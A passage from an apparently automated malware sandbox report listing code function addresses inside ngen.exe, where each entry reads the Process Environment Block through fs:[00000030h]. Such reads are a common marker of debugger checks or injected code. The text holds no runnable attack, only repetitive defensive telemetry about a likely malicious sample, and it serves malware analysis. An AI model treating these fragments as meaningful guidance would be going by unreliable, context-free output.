            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h]4_2_058AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h]4_2_058AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h]4_2_058AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h]4_2_058AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058AE53E mov eax, dword ptr fs:[00000030h]4_2_058AE53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h]4_2_0592F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h]4_2_0592F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h]4_2_0592F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h]4_2_0592F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h]4_2_0592F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h]4_2_0592F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0592F525 mov eax, dword ptr fs:[00000030h]4_2_0592F525
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BD530 mov eax, dword ptr fs:[00000030h]4_2_058BD530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BD530 mov eax, dword ptr fs:[00000030h]4_2_058BD530
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890535 mov eax, dword ptr fs:[00000030h]4_2_05890535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890535 mov eax, dword ptr fs:[00000030h]4_2_05890535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890535 mov eax, dword ptr fs:[00000030h]4_2_05890535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890535 mov eax, dword ptr fs:[00000030h]4_2_05890535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890535 mov eax, dword ptr fs:[00000030h]4_2_05890535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05890535 mov eax, dword ptr fs:[00000030h]4_2_05890535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593B52F mov eax, dword ptr fs:[00000030h]4_2_0593B52F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h]4_2_0588D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h]4_2_0588D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h]4_2_0588D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h]4_2_0588D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h]4_2_0588D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588D534 mov eax, dword ptr fs:[00000030h]4_2_0588D534
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05888550 mov eax, dword ptr fs:[00000030h]4_2_05888550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05888550 mov eax, dword ptr fs:[00000030h]4_2_05888550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B656A mov eax, dword ptr fs:[00000030h]4_2_058B656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B656A mov eax, dword ptr fs:[00000030h]4_2_058B656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B656A mov eax, dword ptr fs:[00000030h]4_2_058B656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587B562 mov eax, dword ptr fs:[00000030h]4_2_0587B562
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BB570 mov eax, dword ptr fs:[00000030h]4_2_058BB570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BB570 mov eax, dword ptr fs:[00000030h]4_2_058BB570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587B480 mov eax, dword ptr fs:[00000030h]4_2_0587B480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05889486 mov eax, dword ptr fs:[00000030h]4_2_05889486
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05889486 mov eax, dword ptr fs:[00000030h]4_2_05889486
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0590A4B0 mov eax, dword ptr fs:[00000030h]4_2_0590A4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058864AB mov eax, dword ptr fs:[00000030h]4_2_058864AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B34B0 mov eax, dword ptr fs:[00000030h]4_2_058B34B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B44B0 mov ecx, dword ptr fs:[00000030h]4_2_058B44B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059554DB mov eax, dword ptr fs:[00000030h]4_2_059554DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058804E5 mov ecx, dword ptr fs:[00000030h]4_2_058804E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_059294E0 mov eax, dword ptr fs:[00000030h]4_2_059294E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058A340D mov eax, dword ptr fs:[00000030h]4_2_058A340D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B8402 mov eax, dword ptr fs:[00000030h]4_2_058B8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B8402 mov eax, dword ptr fs:[00000030h]4_2_058B8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058B8402 mov eax, dword ptr fs:[00000030h]4_2_058B8402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587C427 mov eax, dword ptr fs:[00000030h]4_2_0587C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587E420 mov eax, dword ptr fs:[00000030h]4_2_0587E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587E420 mov eax, dword ptr fs:[00000030h]4_2_0587E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587E420 mov eax, dword ptr fs:[00000030h]4_2_0587E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_058BA430 mov eax, dword ptr fs:[00000030h]4_2_058BA430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0593F453 mov eax, dword ptr fs:[00000030h]4_2_0593F453
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h]4_2_0588B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0588B440 mov eax, dword ptr fs:[00000030h]    4_2_0588B440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058BE443 mov eax, dword ptr fs:[00000030h]    4_2_058BE443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058A245A mov eax, dword ptr fs:[00000030h]    4_2_058A245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0587645D mov eax, dword ptr fs:[00000030h]    4_2_0587645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05881460 mov eax, dword ptr fs:[00000030h]    4_2_05881460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0589F460 mov eax, dword ptr fs:[00000030h]    4_2_0589F460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0595547F mov eax, dword ptr fs:[00000030h]    4_2_0595547F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058AA470 mov eax, dword ptr fs:[00000030h]    4_2_058AA470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0593F78A mov eax, dword ptr fs:[00000030h]    4_2_0593F78A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_059537B6 mov eax, dword ptr fs:[00000030h]    4_2_059537B6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058807AF mov eax, dword ptr fs:[00000030h]    4_2_058807AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_059097A9 mov eax, dword ptr fs:[00000030h]    4_2_059097A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058AD7B0 mov eax, dword ptr fs:[00000030h]    4_2_058AD7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0587F7BA mov eax, dword ptr fs:[00000030h]    4_2_0587F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0590F7AF mov eax, dword ptr fs:[00000030h]    4_2_0590F7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0588C7C0 mov eax, dword ptr fs:[00000030h]    4_2_0588C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058857C0 mov eax, dword ptr fs:[00000030h]    4_2_058857C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_059007C3 mov eax, dword ptr fs:[00000030h]    4_2_059007C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058A27ED mov eax, dword ptr fs:[00000030h]    4_2_058A27ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0588D7E0 mov ecx, dword ptr fs:[00000030h]    4_2_0588D7E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058847FB mov eax, dword ptr fs:[00000030h]    4_2_058847FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05885702 mov eax, dword ptr fs:[00000030h]    4_2_05885702
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05887703 mov eax, dword ptr fs:[00000030h]    4_2_05887703
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058BC700 mov eax, dword ptr fs:[00000030h]    4_2_058BC700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058BF71F mov eax, dword ptr fs:[00000030h]    4_2_058BF71F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05880710 mov eax, dword ptr fs:[00000030h]    4_2_05880710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B0710 mov eax, dword ptr fs:[00000030h]    4_2_058B0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05883720 mov eax, dword ptr fs:[00000030h]    4_2_05883720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0595B73C mov eax, dword ptr fs:[00000030h]    4_2_0595B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0589F720 mov eax, dword ptr fs:[00000030h]    4_2_0589F720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058BC720 mov eax, dword ptr fs:[00000030h]    4_2_058BC720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0588973A mov eax, dword ptr fs:[00000030h]    4_2_0588973A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B273C mov eax, dword ptr fs:[00000030h]    4_2_058B273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B273C mov ecx, dword ptr fs:[00000030h]    4_2_058B273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05879730 mov eax, dword ptr fs:[00000030h]    4_2_05879730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0593F72E mov eax, dword ptr fs:[00000030h]    4_2_0593F72E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058FC730 mov eax, dword ptr fs:[00000030h]    4_2_058FC730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0594972B mov eax, dword ptr fs:[00000030h]    4_2_0594972B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B5734 mov eax, dword ptr fs:[00000030h]    4_2_058B5734
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05904755 mov eax, dword ptr fs:[00000030h]    4_2_05904755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B674D mov esi, dword ptr fs:[00000030h]    4_2_058B674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B674D mov eax, dword ptr fs:[00000030h]    4_2_058B674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05893740 mov eax, dword ptr fs:[00000030h]    4_2_05893740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05880750 mov eax, dword ptr fs:[00000030h]    4_2_05880750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058C2750 mov eax, dword ptr fs:[00000030h]    4_2_058C2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05953749 mov eax, dword ptr fs:[00000030h]    4_2_05953749
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0587B765 mov eax, dword ptr fs:[00000030h]    4_2_0587B765
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05888770 mov eax, dword ptr fs:[00000030h]    4_2_05888770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05890770 mov eax, dword ptr fs:[00000030h]    4_2_05890770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05884690 mov eax, dword ptr fs:[00000030h]    4_2_05884690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0590368C mov eax, dword ptr fs:[00000030h]    4_2_0590368C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0587D6AA mov eax, dword ptr fs:[00000030h]    4_2_0587D6AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058BC6A6 mov eax, dword ptr fs:[00000030h]    4_2_058BC6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058776B2 mov eax, dword ptr fs:[00000030h]    4_2_058776B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B66B0 mov eax, dword ptr fs:[00000030h]    4_2_058B66B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B16CF mov eax, dword ptr fs:[00000030h]    4_2_058B16CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0588B6C0 mov eax, dword ptr fs:[00000030h]    4_2_0588B6C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058BA6C7 mov ebx, dword ptr fs:[00000030h]    4_2_058BA6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058BA6C7 mov eax, dword ptr fs:[00000030h]    4_2_058BA6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0593F6C7 mov eax, dword ptr fs:[00000030h]    4_2_0593F6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_059416CC mov eax, dword ptr fs:[00000030h]    4_2_059416CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_059006F1 mov eax, dword ptr fs:[00000030h]    4_2_059006F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0593D6F0 mov eax, dword ptr fs:[00000030h]    4_2_0593D6F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B36EF mov eax, dword ptr fs:[00000030h]    4_2_058B36EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058AD6E0 mov eax, dword ptr fs:[00000030h]    4_2_058AD6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058FE6F2 mov eax, dword ptr fs:[00000030h]    4_2_058FE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_059136EE mov eax, dword ptr fs:[00000030h]    4_2_059136EE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0589260B mov eax, dword ptr fs:[00000030h]    4_2_0589260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058FE609 mov eax, dword ptr fs:[00000030h]    4_2_058FE609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058BF603 mov eax, dword ptr fs:[00000030h]    4_2_058BF603
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B1607 mov eax, dword ptr fs:[00000030h]    4_2_058B1607
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058C2619 mov eax, dword ptr fs:[00000030h]    4_2_058C2619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05883616 mov eax, dword ptr fs:[00000030h]    4_2_05883616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0587F626 mov eax, dword ptr fs:[00000030h]    4_2_0587F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05955636 mov eax, dword ptr fs:[00000030h]    4_2_05955636
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0588262C mov eax, dword ptr fs:[00000030h]    4_2_0588262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B6620 mov eax, dword ptr fs:[00000030h]    4_2_058B6620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B8620 mov eax, dword ptr fs:[00000030h]    4_2_058B8620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0589E627 mov eax, dword ptr fs:[00000030h]    4_2_0589E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0589C640 mov eax, dword ptr fs:[00000030h]    4_2_0589C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058BA660 mov eax, dword ptr fs:[00000030h]    4_2_058BA660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B9660 mov eax, dword ptr fs:[00000030h]    4_2_058B9660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0594866E mov eax, dword ptr fs:[00000030h]    4_2_0594866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B2674 mov eax, dword ptr fs:[00000030h]    4_2_058B2674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058C0185 mov eax, dword ptr fs:[00000030h]    4_2_058C0185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0590019F mov eax, dword ptr fs:[00000030h]    4_2_0590019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0587A197 mov eax, dword ptr fs:[00000030h]    4_2_0587A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0593C188 mov eax, dword ptr fs:[00000030h]    4_2_0593C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058D7190 mov eax, dword ptr fs:[00000030h]    4_2_058D7190
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_059311A4 mov eax, dword ptr fs:[00000030h]    4_2_059311A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0589B1B0 mov eax, dword ptr fs:[00000030h]    4_2_0589B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_059461C3 mov eax, dword ptr fs:[00000030h]    4_2_059461C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058BD1D0 mov eax, dword ptr fs:[00000030h]    4_2_058BD1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058BD1D0 mov ecx, dword ptr fs:[00000030h]    4_2_058BD1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_059551CB mov eax, dword ptr fs:[00000030h]    4_2_059551CB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058FE1D0 mov eax, dword ptr fs:[00000030h]    4_2_058FE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058FE1D0 mov ecx, dword ptr fs:[00000030h]    4_2_058FE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058A51EF mov eax, dword ptr fs:[00000030h]    4_2_058A51EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058851ED mov eax, dword ptr fs:[00000030h]    4_2_058851ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_059561E5 mov eax, dword ptr fs:[00000030h]    4_2_059561E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B01F8 mov eax, dword ptr fs:[00000030h]    4_2_058B01F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_05940115 mov eax, dword ptr fs:[00000030h]    4_2_05940115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0592A118 mov ecx, dword ptr fs:[00000030h]    4_2_0592A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0592A118 mov eax, dword ptr fs:[00000030h]    4_2_0592A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_058B0124 mov eax, dword ptr fs:[00000030h]    4_2_058B0124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe    Code function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h]    4_2_0587B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h]4_2_0587B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587B136 mov eax, dword ptr fs:[00000030h]4_2_0587B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05881131 mov eax, dword ptr fs:[00000030h]4_2_05881131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05881131 mov eax, dword ptr fs:[00000030h]4_2_05881131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05955152 mov eax, dword ptr fs:[00000030h]4_2_05955152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05879148 mov eax, dword ptr fs:[00000030h]4_2_05879148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05879148 mov eax, dword ptr fs:[00000030h]4_2_05879148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05879148 mov eax, dword ptr fs:[00000030h]4_2_05879148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05879148 mov eax, dword ptr fs:[00000030h]4_2_05879148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587C156 mov eax, dword ptr fs:[00000030h]4_2_0587C156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05914144 mov eax, dword ptr fs:[00000030h]4_2_05914144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05914144 mov eax, dword ptr fs:[00000030h]4_2_05914144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05914144 mov ecx, dword ptr fs:[00000030h]4_2_05914144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05914144 mov eax, dword ptr fs:[00000030h]4_2_05914144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05914144 mov eax, dword ptr fs:[00000030h]4_2_05914144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05887152 mov eax, dword ptr fs:[00000030h]4_2_05887152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05886154 mov eax, dword ptr fs:[00000030h]4_2_05886154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05886154 mov eax, dword ptr fs:[00000030h]4_2_05886154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_05919179 mov eax, dword ptr fs:[00000030h]4_2_05919179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 4_2_0587F172 mov eax, dword ptr fs:[00000030h]4_2_0587F172
